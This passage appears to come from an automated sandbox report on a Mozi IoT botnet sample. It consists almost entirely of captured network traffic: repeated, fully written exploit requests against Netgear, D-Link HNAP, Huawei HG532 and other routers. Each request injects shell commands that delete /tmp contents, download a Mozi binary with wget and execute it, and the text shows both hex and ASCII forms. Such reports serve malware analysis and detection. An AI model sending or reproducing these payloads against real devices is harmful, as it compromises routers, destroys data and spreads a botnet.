63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 133.25.32.167:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 207.57.93.122:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Host: 155.231.143.202:37215Content-Length: 601Connection: keep-aliveAuthorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Host: 54.52.193.242:37215Content-Length: 601Connection: keep-aliveAuthorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Host: 137.232.182.11:37215Content-Length: 601Connection: keep-aliveAuthorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Host: 203.193.218.4:37215Content-Length: 601Connection: keep-aliveAuthorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Host: 69.153.25.131:37215Content-Length: 601Connection: keep-aliveAuthorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 